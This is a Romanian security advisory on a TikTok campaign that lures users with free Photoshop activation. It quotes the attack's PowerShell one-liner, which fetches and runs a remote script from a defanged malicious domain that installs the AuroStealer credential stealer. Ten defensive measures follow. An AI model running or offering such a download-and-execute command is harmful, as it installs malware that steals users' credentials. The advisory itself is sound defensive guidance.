Pe măsură ce popularitatea TikTok continuă să crească, platforma a devenit o țintă pentru actorii malițioși, care exploatează baza sa vastă de utilizatori pentru a distribui campanii de malware sofisticate, prin care se oferă activarea gratuită a unor software-uri populare (precum Photoshop). Atacul folosește ingineria socială pentru a păcăli utilizatorii să execute comenzi malițioase PowerShell cu privilegii de administrator, lanțul de atac începând cu o singură comandă de tip one-liner.
Comanda executată de victimă (iex (irm slmgr[.]win/photoshop)) descarcă și execută un script care, la rândul său, descarcă malware-ul AuroStealer (pentru furt de credențiale) și o a treia sarcină utilă (source.exe) care introduce o tehnică avansată de ocolire.
Această tehnică consta in compilarea C# on-demand în timpul execuției, folosind compilatorul .NET Framework existent pe sistem. Codul compilat alocă memorie executabilă și injectează shellcode direct în proces, fără a scrie fișiere suplimentare pe disc, evitând astfel detectarea clasică bazată pe semnături.
Sfaturi de Protectie
1. Blocarea Execuției PowerShell de la Distanță (ASR)
Obiectiv: Prevenirea descărcării și rulării de scripturi din surse externe (precum iex (irm...)).
Pasul 1 (ASR): În consola Intune/MEM sau Microsoft Defender for Endpoint, activați și setați pe Block regula ASR: "Block PowerShell scripts from downloading potentially malicious content" (GUID: d1e49aac-8f56-4286-92e9-08e219d361c3).
Pasul 2 (GPO): Aplicați o politică centralizată (prin GPO sau Intune) care limitează funcțiile avansate ale PowerShell-ului (Constrained Language Mode) pe dispozitivele utilizatorilor standard. Chiar dacă victima rulează comanda, Modul Restricționat blochează accesul scriptului la funcțiile critice (cum ar fi cele pentru injectarea de cod .NET), făcând atacul ineficient.
2. Monitorizarea Activității Compilatorului .NET (csc.exe)
Obiectiv: Detectarea tentativelor de compilare C# malițioase (tehnica de ocolire in-memory).
Pasul 1: Creați o Regulă de Alertare - În consola EDR/SIEM, navigați la Detection Rules -> Analytic Rules (sau Advanced Hunting -> Search) sau secțiuni similare.
Pasul 2: Configurați Ținta - Setați regula să urmărească evenimentele de pornire proces și să alerteze specific la execuția programului csc.exe.
Pasul 3: Filtrați Activitatea Normală - Excludeți din alertare toate execuțiile legitime (ex: MSBuild) sau cele care provin din căi de sistem bine cunoscute.
Pasul 4: Investigați: Orice alertă rămasă (ex: execuții inițiate de PowerShell din foldere temporare – %TEMP%) indică o tentativă de injectare de cod malițios.
.
3. Implementarea AMSI pentru Scanarea Scripturilor în Memorie
Obiectiv: Blocarea tehnicilor de execuție în memorie.
Pasul 1 (Verificare): Asigurați-vă că serviciul Antimalware Scan Interface (AMSI) este activ pe toate sistemele Windows 10/11.
Pasul 2 (Monitorizare): Monitorizați jurnalele AMSI (prin EDR sau SIEM) pentru a detecta scripturile PowerShell/Python ofuscate sau cele care încearcă să folosească funcții periculoase precum [System.Reflection.Assembly]::Load().
4. Aplicarea Allow-Listing Stricte (WDAC/AppLocker)
Obiectiv: Prevenirea rulării de fișiere binare necunoscute (updater.exe sau source.exe).
Pasul 1 (Implementare): Implementați Windows Defender Application Control (WDAC) sau AppLocker (prin GPO/Intune).
Pasul 2 (Reguli): Permiteți rularea doar a fișierelor binare cunoscute și semnate digital. Blocați executarea fișierelor din căile temporare (ex: %TEMP%).
5. Restricționarea Drepturilor de Administrator
Obiectiv: Minimizarea impactului în cazul în care utilizatorul execută comanda malițioasă.
Pasul 1 (Least Privilege): Asigurați-vă că utilizatorii finali nu dețin și nu folosesc conturi cu privilegii de administrator pentru sarcinile de zi cu zi.
Pasul 2 (Impact): Orice execuție de comandă PowerShell care necesită privilegii sporite (pentru a instala servicii sau a modifica registrii critici) va eșua automat.
6. Monitorizarea Creării de Sarcini Programate (Persistență)
Obiectiv: Detectarea mecanismelor de persistență utilizate de malware (schtasks).
Pasul 1 (EDR/SIEM): Configurați monitorizarea EDR pentru a detecta evenimentele de creare/modificare a sarcinilor programate (procesul schtasks.exe sau apelurile API).
Pasul 2 (Alerte): Generați alerte pentru crearea de noi sarcini programate cu nume randomizate, care imită procese legitime sau care rulează la user logon sau la intervale scurte.
7. Filtrarea Web/DNS pentru Blocarea Serverelor de Payload
Obiectiv: Oprirea descărcării de payload-uri și a comunicării C2.
Pasul 1 (DNS Filtering): Asigurați-vă că soluția de DNS Filtering blochează rezoluția numelor de gazdă (ex: slmgr[.]win, file-epq[.]pages[.]dev) care găzduiesc payload-uri malițioase.
Pasul 2 (Proxy/Firewall): Aplicați reguli de filtrare (pe firewall/proxy) pentru a bloca comunicarea cu servere de tip Command and Control (C2) cunoscute.
8. Monitorizarea Traficului Criptat Către Hosting Suspect
Obiectiv: Detectarea traficului C2 care folosește servicii de hosting legitime.
Pasul 1 (SSL/TLS): Implementați inspecția SSL/TLS (dacă este permis de politicile organizaționale) pentru a detecta traficul către paginile de hosting utilizate de atacatori (ex: pages[.]dev sau servicii cloud generice).
Pasul 2 (Alerte): Configurați alerte pentru cererile HTTP/HTTPS suspecte care par a fi descărcări de fișiere executabile (.exe, .dll) de pe domenii neautorizate.
9. Instruirea Utilizatorilor Legat de Software-ul Piratat
Obiectiv: Tăierea sursei inițiale a infecției (promisiunea de software gratuit).
Pasul 1 (Conștientizare): Informați constant angajații că software-ul gratuit, crack-urile sau activatoarele piratate (precum cele pentru Photoshop) sunt vectori de malware și risc major.
Pasul 2 (Politici): Stabiliți o politică strictă de interzicere a instalării de software din surse neoficiale, mai ales pe dispozitivele de lucru.
10. Utilizarea Sandbox-ului pentru Analiza Dinamică a Scripturilor
Obiectiv: Izolarea și analiza scripturilor descărcate înainte de execuția pe endpoint.
Pasul 1 (Configurare): Configurați un sistem automat de Sandboxing (sau o funcție EDR similară) pentru a izola și rula orice script PowerShell sau fișier descărcat suspect.
Pasul 2 (Analiză): Analizați comportamentul scriptului în sandbox, punând accentul pe apelurile de sistem, execuția în memorie și încercările de persistență.
Pentru mai multe sfaturi și informații despre securitatea cibernetică, vizitează regulat sigurantapenet.ro